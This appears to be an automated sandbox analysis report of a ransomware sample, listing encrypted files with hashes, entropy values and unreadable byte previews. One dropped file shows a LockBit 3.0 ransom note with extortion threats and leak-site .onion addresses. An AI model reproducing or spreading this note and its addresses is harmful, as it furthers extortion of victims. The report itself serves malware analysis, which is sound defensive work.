                Preview:....{...3.W....n....L...M.?.0.y.M.[....P?....w.xt.C......j..a....b..Bt).].a.l.t_o..v..i .F..d...j..c..v..O...1....J...(kI...i..[.7mq......e.Jl.It.b........._......lE......V.qn.s.@....;.v8.....E...GiOE.<..F.;..E.6..q)zC}...._&../..f.smG..'....&.b....J..RK.-..g...tK{k.A...rd........W.)a{...t6.13.a3...>........>(../...!M-a......."..C..+.M.5..g..'d....!.m{+.6....q)..}..k-.i...9..|..]p(X;Q........k...A..8.,hE........<v..r.A.iJ....l.8.......(a...8D...l....a..N<CLC}M-.V7.;@S.Y.#..x:...8O......@..2.?..k...\.1,..Z.8.-...e..........7.;....r.`....9....(...<.A.8.o.l.Yc..K4.b1R.c~.:f.......Z.M.$<.rL...../. ..Y.XN2..,.]<.....;}.G..q;..B...W2..}C..~QSm...v.......+.w.:..2I...6....;_P.5....ELDX`...B.k.R. $E......|...?s6.A.b. ....q.r.Ol.n..E......13..y(.R.wP}...7...&...G.XN&.R.Hg%.T..e1...\.*...._Q.P.%^c...N.y#.T...ve...p..O.d..o....y4./ ...6S(+..B...(.em.G/....}......z&..^.?.|w..<.[.....h.C....b...v............]..4.>)K....).7.u.w.U....P!f1.C.....

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_ZuneMusic_8wekyb3d8bbwe!Microsoft_ZuneMusic.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4522
                Entropy (8bit):7.959639128946006
                Encrypted:false
                SSDEEP:96:AGrqEiks+tnwk6XLm58JTfCFVOOwKevXjw0mFMjRzeLQ642Y2GHezR:AG+EiJ+tnwk67xTf5O4vzcijR6L62Yo
                MD5:845C764373821F8C035383FD5869EB27
                SHA1:CEB4FE687F3F4A9268D05257ED1A18075849352E
                SHA-256:65BD94B3B26C3CBCAD687647A92A38ECCB785700C6A39427E865E40E4A29B775
                SHA-512:6D8317546812BB7E8C73C139A280AD86EDD6CA0337AD8B9A15CCF04524A4D13CBDBAEF0EAF560341333CC3B9BBAB6C0B8B5ABAA485E53262F9ECF0A5724CB768
                Malicious:false
                Preview:P.+.J.o.z`.@.....nU...m.Qn.Ni.\O9vCy3.C..3.h.,.D8..@z.....9{.....,..Wj...{.1y....mnt9.H....l*4:...W....I.....?{.1hM,...Vi>.R...-9..s'.-}..{_.......E_.W...l.....y..3.:\.U..8....1>..Z...E.C.&..-......B|S|.sT..W.7..~.-.....gu.*L.i...b...V........p.. .+$..MG=...Sk......3.g..... ..T0y|^..Y'..o<(u.._..%5....*..c..@<2.b.#*....p.x!.$.A...I...w.Q.W..H;A.n.LNB..I.|..~.f....JafE...G%...~.\.mz...[e.@..!..^..1.l.I%.7.......v..~X/...*h>..j...)...*...2..fj......~.K[.f.J._....fj..N......!WU#C-.a...T....6Y..e......(.~..>...E...||...>...>F.(.?..Q.BG.f.4...N......,W.Hk..@.$...[...S...B.....^...Zt.F.GV/@....*f!...3I.....3.z..~.;.N....'.....;.I.P6!..f..x.e...P6.....)...<CK.f'....k...[..)7..S{..WX..........C...V..G.......>... ..R..2...<.`.m..?...H-0...'qp'......u[u.G.w7.|<9.GO...0.....D....O.....Y...N.aiQ.nY.y....3..%............i.t.!<*Ed.Z..o..U..c.J.$.?-..m.k|.'....p ..\@.W.aC.....CXB..8..........$...Z.=.u...Jn.*7!}.H%..~..,..3..|........9.......1..8..+..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_ZuneVideo_8wekyb3d8bbwe!Microsoft_ZuneVideo.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4522
                Entropy (8bit):7.962039507809698
                Encrypted:false
                SSDEEP:96:u5tcIUaq45rlXRb+L1mYN0NdXTr6LlypbX3cCwk3ZAUy5caS75OJfd2AR2GHezR:IcIgrpQXaIBKvaFgj2Qo
                MD5:89317E33279D633545EDD9978E0F0F58
                SHA1:B6AB418FC0356781D4E8D69A1B59E42B6CE2B507
                SHA-256:543C59C358A8EFD239808C227CB5874BB3E214F604D19B9ACD2E1409BDE1B7E8
                SHA-512:8107899A67E009D7F6E99899773166AB010D4D9EBBB6F1E0CBC5649F303F441A9559A27B8C8F2660DDF26E3487B68A04EE7419E35B7206D83A85EED5DCFBB586
                Malicious:false
                Preview:'.c...d.....,..d.G}..f.`p'Yh.O../....pY..d....i.............i..s...K.u6&...6...B.l...........o.D.k.+..I.wL....X.....8.0...p.J.AHE.^`|.X.......~y...S....w0...|..c.CmA4....v.......o.%&.M.......,..&.w$.K.sK.Y.'/j...k.z.....?FNf.+{........[..:....#s$.n.a.o...%.n...V.N#S.......T.....l...a....?..."b.,# b.VD...)Z...q..g.p..|;.".w...=.u.....-8~.}...,+...g.=L.&....p......^q.!X.....?...$.GX.31.\H3.[.[dN-+....p!.....4Ua.z.. .1.>H...t....\... .K..`.......<&..|g;..A5J.B(7...49`...Q .@..u..."]K.L..E...^..e./......?.V.Y........{.LU..Q.iZc....B....^T..........n..s.*d./.Y.k....s{._.fP.j.N...).U..#."..^"S.Wz.........a\vW.......riR......1.f.`Gf.Lp..k$+.D.....Rbt.u.../<,.....9VT.s..@.#.8.X,..\.kp1B-Qa.3$n.{n3....mS@u.z...C...-"..D..ZaU.........8..7.V....#.......3t!..T..~s^...Z$.Z....../MI.*.+.!.b*...._."K.5.....W.<.eO..j;...3h..",.I........g..7..p...@.x....D.i.N"+.C....'KD.."4.#..Y(....nq..."@..igM.#.Y._M...........lMenQ.Oa~.A...ARWw.t.l.;&.e...

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\https___java_com_.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4490
                Entropy (8bit):7.9585473717033866
                Encrypted:false
                SSDEEP:96:u906AV8U4aAvD8zUMzbGQwDv2SvQg+M0/KFyQV802k2GHezR:/VC1IzU83kuS5D0/cBo
                MD5:F2DF99B47A255ACCAF30BBAE0C685BAE
                SHA1:7E7F4E9A527AB885911B39A5A3AD739142564834
                SHA-256:492E188F8AC0299F18DB719CBBDA164264D66C1B234CEE807E402923AF6D0B95
                SHA-512:7C4FD7A001ED2C11B01280C8C69A755AAEB774106AF47F4A2E5F70A443AA9891D0E58BA40C8934498F52D631FA7D612CAAA47730F65DC4AF1A2F5CE128C78FDF
                Malicious:false
                Preview:..@K..).@.D.~g.y9.h..0.>..Bm .Y....6or<..|`..;v...c..6.......*yl..'....Bg...".bZ...s...._G(..*..,....P.)...m...F.~}..Pg.)x$..>..L..Y..,..G.X9B.nHa..h...mm~...v5.Y..a.L.z.......+.(...9..ur..0^<....p..i......8.\....g.L...K....Fp.....0.x&yr.%^w.z....EiI..VH.S....sY.]...^....Yc.....fG.zx:.-4...h.t.....R...z.U.....m.....~T@.........u..,l#...o......3.c]...........*).."[Gl.5w.=.u..l......l..?...4Ju...o..8..i.........q..5.r.%.{......v.0....2..........a....8.p.,..>^:.`.n..F.N?.S>..%....m.............T\...t.N..r....k.....-SDQ.s....Qe)..q.I.G..F..t..>]..8...y~...^..,...AB...2.Y{^.<.x_Uj.5@.0K@.UE....?1^<.DT.D...._.V....<...D.X.N0...f.....H.r..vcdF.vh..C...AE.{@.z......P.~.@..F...@...x&.....v.[.o[.Z.2....u.TOR:."s.)..n..{.D*..m5..^.nb\...1.!r.C.=k5...f.y....SlX.u..........|&...S.EXvH8mA.....30..$..e.sC".f.B.z.@}.2 ..uOj.....?.d..._S..5..ue;1..G..aR.........mqdB.l6........-..D.K.X...f..-......=.~.5..z..^c.....h........b...N....:..W.&.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\https___java_com_help.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4495
                Entropy (8bit):7.960269837261114
                Encrypted:false
                SSDEEP:96:Y4lsd2FA3VQQiqYTrTW6JdnNDlFca0MVq/8Tloknc8WQE6AY7P6nBCM2GHezR:PsdVEqYfTjLn2lMA/8TKqio7P6BCMo
                MD5:E1386B4E586C7163FA4AB34A586FE25F
                SHA1:414C8280A10F8DF7CDBA40F7D1554BFCDD21D81E
                SHA-256:9E2B71F8E8C4CAAA41F35F81D6727785D11BDA0CD5549C8C1B64E8B3E9AB998C
                SHA-512:43848B542952100CCC8A467821298B292AAF458AF514D1832318023A3FF725D61F4061665EED944BC34213BD6BCF2F25976EB016BCD135C261177243CF74570A
                Malicious:false
                Preview:e.j.;.h..(....&@..A....m...v{F{..@......[&....INY...f.....<.,..........=...G$.....'.........E.^&.,".PR....^N.&....Ah.L0w...!....>......j.U...}...s..{(...i..H..u..G9....?.$n.n.1..v:..|..g.s|...AK.U...h0..tc.f...y5.I.2...G....nb....#.P.?.......{KV..4......f...F..K."...@...hl...%..@...N.B;C;.....+.;...8.i.......b.....U.N.'..+6(....Hb.D..h..k.X..u;.E~.....h3a..T)..."..20>.;eO4.B.....&..>n.,H.W.$.4...S.CY...].s...}..Zt.M#.\..5..jw...4m.H(3.R...FJ.XP..`..^.3u..5...Q.x@p..u.f.Glup.....J/Q~....63!=..k.N...83{7.U...`.+.K>a|...s.y.8...#...xy.qaf..........`.=...N.&....Ng.."k....&............8...=.([pPm..x....{.PR..$.Qn.E.H.A.. b?.2..Q..e..t....G5i..Rt.+Q....e._-Gb...:...< s.%.Q^"..Zf^...\...9:...@.AP.%...N...`...G#kk......Mo#.7.S.._Sm..]X...Mb.hb.fc.?...?2._.n1+.u{qi.M.G.6.EW.w...\..!0g._.i..>.O.~(......^...<...`.....P...wc.b...?...'Z...U....:...........yKJ+..0....`P...w.l........h.bn.Kk0.\..5f...j..D......>...8.[...n..Cy1..K....y..Ev...pJ.=@j...#..G.....)/..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\windows_immersivecontrolpanel_cw5n1h2txyewy!microsoft_windows_immersivecontrolpanel.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4544
                Entropy (8bit):7.96080797480584
                Encrypted:false
                SSDEEP:96:ejW+oeVazSeuHdiG49iJeu/Ov8bX80tVnonRgxBwMRII2GHezR:ejnodWb8ybmEz83NMRdo
                MD5:851F3DF71444A888129DE6501A376263
                SHA1:9F23C16164A5DD75A981290E4408C2726F6BF281
                SHA-256:1EDCEFD37B7F7883608BBC08D36B04670005FC6F9B4EF1ECA41867D60E255458
                SHA-512:184A7A18E06A88B01A132B5D91E2332D1D44F61A5F8A4DAFC94398152BFAEEBCDB16B8AD85C65502CB3165D1372D6E6688A077B7B6B25B7BCCAAC3BB4809BA22
                Malicious:false
                Preview:~.7.3..7.(*..../.............]...9._.A...?..K..a...6....y..U.I^.8.-......P...4./c....y...G8%...J%..a......ZZ............Lb.Sy`7O...}t.Y.@.m............vz.uu.......9...(..<.4.9....3..O.U}-.C..........X..T.......:Es..>....k%...D..7...7..N.'.U... ..CD.r..].:.lS.d...0h.%xM...,#(k.#.!..}......c...F).~....^F,@.....$.h..c...b..C.....a>.*<]..C^..c..o...c.]?....E...&...%....2....r..Q`..b...tA-t........(..|....v........_.;K....{'..@.T8.F.....z........A.T.i.y.2.J..u...u..3..7.2;....S."..Nv3@...3..>..q+.'nA2.._.7p.&..RRS...mf...>.|@H.i..w].Y..?..-.Nh=.P%?....D'q.1...P...#..V.g.Jasa.Co.-{n.....l..g..Un6J.....&Vv.T+.7...!.b.r....T..r.t.. ..).vv...&`.S..7..WXX.-.tk.....N....Hv.p.9;.......y(......2..i...F.X.fO.9(^..9=.e..q.Z.......(0+....D......$...j.$."..$M.P...K_.6.+.7.....@j..w.z....p..CHau..ei...68y.T.P......../....ZS*...YV_.Me......HT.<..s....66..Bs..?..n...kpy....mRTZ..K4\}.j./..6.:..k|8.?.i8.. ..T..a.mM..V..0t.7.;.3.m\}..d....

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\zn=BV5!!!!!!!!!MKKSkSetLanguageFiles_.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4515
                Entropy (8bit):7.962752750872549
                Encrypted:false
                SSDEEP:96:Ju8xbbBWzc2Nk4pIZ1o9ReWNcM26y9uZiEMgLu3h2GHezR:JBbszLZIbseWZ2xCiERLkho
                MD5:323FFAE676D3E19C4E67F40ED30A9058
                SHA1:47698F9B0B5DBF8028A116DE7D75924DC4746287
                SHA-256:DEC8C06B296F4D7255E0FE017FE139A6B801FF102A31FEB16D3D05946200414C
                SHA-512:65C09156EAB926E554D598639DB9F1ED348D0EB2E64064C5F64BA8DFE7239A49088411D837265ACA2BAB1C4BF48F675B40AEF0166CAC0A34B2F212BBD8FC108D
                Malicious:false
                Preview:.sN..iv.u...z.A.....e'9#S..lY.W..o}S.8..<d......;U...Q..)jX4..z.Z7Q&h..m.......15.P:..Wh....Mo..v..t[...%..P...Z.8.3On.....2h.t.6XL....#.&...OT~g..^...Eu...B.cM..jZ....%....I.8......^3} .ak.&.1.X.....B..0t%..P..c..r....g.gNH\.b...Y.Zv.,z.5.....K...4)..[Y....c.....*..[..)..X.=.SF=..9..$.A&.91M.u.rb./[g.k7..^.....<7..5.=..G.s.S&.$....~.x....H.I0t..4P?..g....k.<.............,-8E.xd.._...."...:Y(.?&.....A.9..H.].....Y..W+......#D.'9...K....|[...@@.{....{f$.s#..is..5L........_......eU..G;X3.+...._W.......y.ST..i..0.4>..6F[L.(.a. .J...z.iN.5p...q.PJ.IU....9........gykW..!>...M.O.*.tg..@.\Q.*B. .X$...2B.hq.....t........),8QY..E...?.h...%.........+....Jj.t.#2.F......^GJJ....&o".....F.....".....=..(.6......i.Lt.).utF.}...../_.&%R...,...........L...o..d........Vk..o..C..'.,xw-|..9.-.......KH.._y....H5(..~%e.L...`...o.C...I..r.}d.+.62.F.....f.d...G.l%......"]...........'...H....7..0Ey.A..p"...[M.....D4.........W......2.T.y..Bt....?k..Pz.^..w,.'.....R

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\zn=BV5!!!!!!!!!MKKSkWxpFiles_.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4506
                Entropy (8bit):7.949340375759694
                Encrypted:false
                SSDEEP:96:ImxSR59G3qlnlxx45I815JT2NPoW8jK4U9P7b71nGdAU5DLfYSxF12D1V2GHezR:I0SwolxaxvJT2+W6KbhwjJL7xiXo
                MD5:3235132C8E8848B1436F734069E63DA6
                SHA1:E42D597A3210352F86B49BA199353092832F2DF1
                SHA-256:316BEF5B79EE8A6CC75D1617E058829CF129D22A8C2A269B612D3E0E5952BF66
                SHA-512:FC8131BBF06FEF25B07E606AD8429DF8AEDA5E0B8BF3329F4ACBF2BF792296A540740C6DFADD9800971D99510DE473319784D8FF6910EF5FB09668011DF858E5
                Malicious:false
                Preview:(..$K..*[..T....VN.x1.2.L.]..J...[...)=...e..6.1)....Z8.......c....>.PAq....3.....O.n..)..^N6...<...|3..G..F9k.U...g.._...0...-...E.-.^I.g...G.....B1.....3.$X..ad;.......dV...z...?Y7...P42.<'..H.....qx'...cH.h.K..O.....T.o..jV..zH....M.5....O...0.+7u....d...r.......W....X.....D.B8h.N.T..w1..W5.~n*..#....o.r#7...4.[h....+...v..CuLvm..R\.)JRM.].E.....Z.).%........n3....E.(.......@....H_..sPo.Dr6G....i..*}.....t..o...C..!......c..e..X.....@.^3.^!*1^@.....K..Z.?h..y.YZ.L.&..vLx........y..B...=.SV<Y}K..@......`....6.ko%......s.<m.2*..7).......J..;l..W....x.Y(.....NG.Bb.!...q...>.NQ....Y3E....9r...nY.:.X>...U .W'.(. .|'\.S.."0.Ma...9'..z.v...y2..t.u..'...{..C .E.xH..b.]....e..:w...b.,]..P'm..(.t...G.["...g.9.{\.0....;..g.............H...L...s.......@......$'..4.`..uLN\..r#jxI....C;...5*......a.n.y.K.a...p....t.......b4.UU.i.......E3..... ....<i.O....j.'.d....,B.......&NnaF..+..:'.0.H.....P7.C..,...*..Y|0....7.F..P..]..]......a........f...a.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_MdSched_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4532
                Entropy (8bit):7.9565667946424705
                Encrypted:false
                SSDEEP:96:Hk66JJmMAsTnOCxIRiE9NBGVMeE6ZHYtK86WBPfpRfcoCCZCGUvrgl/EpyeuE2G6:6Jm+TnZ6RiE9NBG3FHYt16WBP8oCPGUQ
                MD5:D700941B397C1C6C0A668E2A0307B232
                SHA1:38BF8D874F5E327D01FB2C8BFB41AA6E57FEBE32
                SHA-256:D5B2F6037F585CE6FD7D1277ADF30B6D26CDA87F9DBB0804C7EF464226CAF722
                SHA-512:F7D2AAD0DB802A1FB08D85830F1200530BD5E73B3F5F71729B3A6F43E72E2C8876B9FAE824199565F0FAF6DBC608F7DB081170C6A3F0C15BA524BA134F263952
                Malicious:false
                Preview:o.w.;m7....g...(.p....v.d.x...MN%...#z.jDl......hi.D$..y..`...h.R8....9h......6..<,.NN...C...sK,......)9.....B......OA...Oa..O...=3.we..u...7..m~U...N2....}{.;."Y...88.\.Q..\....t|Y6..E..og6...z8Zah!.4.7......Ff..B.)3.`..q.FV..X.m.G...{..}...(n;..CS...1.B.zv.-L5h..:....lQ.2.U.^Ov.W..Fk.0S.&..5Qd'/.|.kr...,...q.H.......c.........n.;_.y.W-..Vh.:..*.Kk...gE.?....E!..GKo6n.K.g..5....J........ ..c...I..>....Ni-..M".V.......W<D.}_...^.......3./..L(..v..^..G......aqv.:y.4......D......+....8...L|nn.....r..L....k.;.W..71...~......u+.:...-....[}.).i..O....o6...C..Q.,|.w<0..{...S.(Z......`.W5...."..{.J.....u.,...>.T..{y.Pj?.I..6..._$0...~...#w.%&.W........7Y.}e..Q........1.R.o. ....8./..+k..Gq_"..u.Z.E....kW/.^uRz!...u.....0..a...$.C...c...-.3Hf..`>....S.@.&.j.&V.7..%.Q.h..$......&.+......[........p.........],.u....#....>..pK(F4.7.HD!.+..<.ox}!(...6.g.;...d......D+.:.l..ing.....GP....s.!.:...j.......v..n...%...&of.A.......b..z.L.{l.e...

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_RecoveryDrive_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4538
                Entropy (8bit):7.962157076057189
                Encrypted:false
                SSDEEP:96:cfKBvJ0+KxFAE0lAoPZQO5Mi/vqvJgLvNHLnbeA4XUlS7IviFNor2GHezR:cfOJ+xGE0luyLvqvJSRrClLFWro
                MD5:6B9104CDCE6207890043BBFD7C9CB7F8
                SHA1:529AB07FAA975921A80FD112356BAF539EA4CD4B
                SHA-256:C8FC6F75E06865265B69E2F8B20A9180C1E62C68C5E50563EF8B4DE04F288269
                SHA-512:6FF0D01C1637103F070FA99036DBA1D7ED9D8482ADECD0E2D0654C6B8F319D960A125933458578E23CC91F1DD88DC0BF43B12247BA8E694508DCBB2337787361
                Malicious:false
                Preview:,n.G".}...~.uy...%qw.n...z.. ..}..G$k&....d..4....H.k...|b{>....|.]...5.#..?.6Z..dSq....].'.*.t....~..t/-N...w7>....@.....x.'3..k...A.+y:..P.|[.[.s3.H..B-..EQ...&5qn.E.a#`p5..C....\...r.g..4.L....'.x..&....#...p*.,5..).)....wM....j{94..:..k..0.....2...MW..K:\..=..P..f...:/..DG.Bx../@#..\..o.E..^,9.R.!.?.i.........f3....m.+'.'...?d..$.......L.)n."9.5......j......*.6....VU..J.1.I9.....y.|5".wr..=_..X.-..........^.8.....~..Y..a.u.bE>:L..F.t. ..S..=k fG....05;.(B...V.t..=../vM.t.fQ.N.Dy](..[(..8.!^....Zr.Uw...`.......\ZE.$Zx.t.....Q.6.r*-.U...`.....+..9(......9v._T..d.zbEt.i..).y..x|u?...r.(iS.!.w'Vr......C.........`....HM3.K\.b%/`....vK.. ....".&......Ue..... K. .......@..GA.......97.H.6Ya.....T....k..F.P7...*....(.>Y.....7..q.C.oJ.z{.D.t....3..d.KZ..s^.s....7.......K..m....QK.......(.zE.........1*.z44.._._. .$....?..L.pU........H....(;.-Gu.$.Cu.....6..5m..F}....#.U..<..G....>....a.....3....n."...7......F.!...g...UV.S.:..i.,.\..nPoZe.?.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_SnippingTool_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4539
                Entropy (8bit):7.955961925245997
                Encrypted:false
                SSDEEP:96:orstd8VUFD0PsBardnQWbCih4+5A3gbshglM2GHezR:orm8VUFD0mazbCih4+Sg1Mo
                MD5:9819B4E7AA125ABCB96176769A3328AF
                SHA1:224C6F46014795D88018EF4F4811A32B6A673E78
                SHA-256:1007131A4C371C59BDF21C9E5E61D777FBE1C036A79DFADE8A0E2B03DFB62125
                SHA-512:2B1C379AA2614F61292E6BA316E38E5FF5293F184C737A3E0B5AF9C1D5DB29C313D3C06E06780A94C964B9CF0EDFECE9EBA27D2BA408747E301A035ACF342B35
                Malicious:false
                Preview:..T.4iWz.=...9.H..~......gt.'.v..3..%......._F.&6X.(...i..#...7t..Qh...>..!E../...RXt./..o.3qO.......7.v.......T.......nP;9..S.:..ae....N.Mr}2.....\...?..t....1T...D/`...s.2k..D.......n.e.u4..m..b.#.N...O^.8.~.e.^..<e..r.o.Z.[(x..........s...9X.....Q}z.}._"R..$e.0K.v.gh.....7.'.P..h4..n..E..0E.b.. 4.......K9...i.......E.q\..Y.X~;.P?..a.j..z...~Y.RN.h..pU...PB.et9..$..z....Q-..I..|....>..2....2....~.KI.....%.o....G).......4/.C...w-.R.`.O.G+...WsgG..G".....V{.cwy...V..j.P..2..<%7....z2#3f......h.e..b.......h......|.....q$?<$.......K&S,q...x...3f.....q.~.1@......M.^.wy..zj......j0...L>..qKS..h..`.`..gG?0..|\.ar"y.j...7.G+..Y....7....'.f.....[.h.....e..z.?....A.\.._[..L'Uv....)....Q.t._.N!..,...n.(.@.f.tp.....c.Pc.Ev/I$-!A.9G....p...@...es.".:n_./HU.~u.....#..k....qu...o.k......T..X.............2n.%J.]....OF...<N...'".Ru,....ut...nX.wIQ....F..).._...-....... .>j...x.f.'.A....@.?A...?.g...2Xi.k...4..c....H.I.....4.1.S...jv.;.^......W.B."3.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WFS_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4526
                Entropy (8bit):7.9612625388337595
                Encrypted:false
                SSDEEP:96:1JtigMmFml/LQrIo9Lse8TG5068Km4/p3qe82zwTiED1e2GHezR:tig5ElccojeG506bm6p3w2zwOEReo
                MD5:D1E5E323354CA0B2D821B29103111F11
                SHA1:BFA9374843DCFEE359998CFE43684EFE73D3E1E5
                SHA-256:F72F6E43F92EE89FCE50F3360E995A3A2DDC9B51D1AEB507AD524AAE20837BFB
                SHA-512:00FE1F006F4EF1F7ECCFBDE8101033E09EDD46204A7DB6C36768EDFAAD9B691295DBDAE4079EB4C1C16160EA25BA593D19A807D7FA4F8C94A09219B6A4A56355
                Malicious:false
                Preview:.#.zB.}...e..B.)z..G.g....}7.W).n].=..o".............-.~...h.]G..... ;.B.....=l.aw...iFv....g.""....k..vo)...hv..+.T.=.&..'....."./`.)..a.W..Fp.;Y...b..Z..5..N...~..>.........iZZ....v..kf.....Q~.m...k./?(./>....>Z./UF.S..F.K..R..+.<1"...Z].]....&.$<.....[.IgK..P...SU].~.-...)........+<R.e........k.o"..{...t.i.f......:...KR.H...8h........k.=_..Y...nm.'.....V..]..S.W{...x..!q.KA..O".F!.....l.T..n...F....a>].T.\....4*&..E....vP.Y..sSW{1xX..X...a..sza...0O.#$+b...2?vy.....f.l.......6..I..0...m...b.............?......-l}l.^9.G...._..Z.8..g\#.8.k.0[.K..6.,zb.2.y.;.4......}.L..lEl.....).M&/....u.^.bA.>...6.E..7].U......iy.K1.9..7.<..Dt[MY.....A)....}oo.... .....g..g.%0,.h.F....1..N.....p.>..t.F..$..}&+..Q.Q.k.>.p..!........<7.V...t...P.}T..I.z.9u...5C{...j.x).F...a.2.xl.2y^ud._2...ru......m.,. .Z.Y.....}J.mg...|...)......n.....{..P.}\.n..plcd.v.g._.3..M7RW........c{{.I.w.-........z..0!.........$t}8..%...^3...1X..2..X....H.{...)<..6.....g

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WF_msc.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4525
                Entropy (8bit):7.964395451988166
                Encrypted:false
                SSDEEP:96:gIj5BPp/TmbPJHjfE+5/w1h0AoJGGdh/LMWFcDnRzoeD6wUsL2GHezR:n7prmDJHjc+5C0bUUl1eDZVo
                MD5:BC8D60E84A670FCE827AE054DEB3E473
                SHA1:DE477C70B08E4A18453B2EC10E1E2C00D7E557D1
                SHA-256:7C7F999AD5E876D0A1E3FA87111991320A53A07963819577140A901B77F29903
                SHA-512:766078DC30C3F0025E093E2D45A65FBAC1D764920CD4DF10388E9246B9C8FF6C5B05915E2F7EC775A18B206A5B66B6A1F7E98899B66D75F8371A7FD9406EE8AB
                Malicious:false
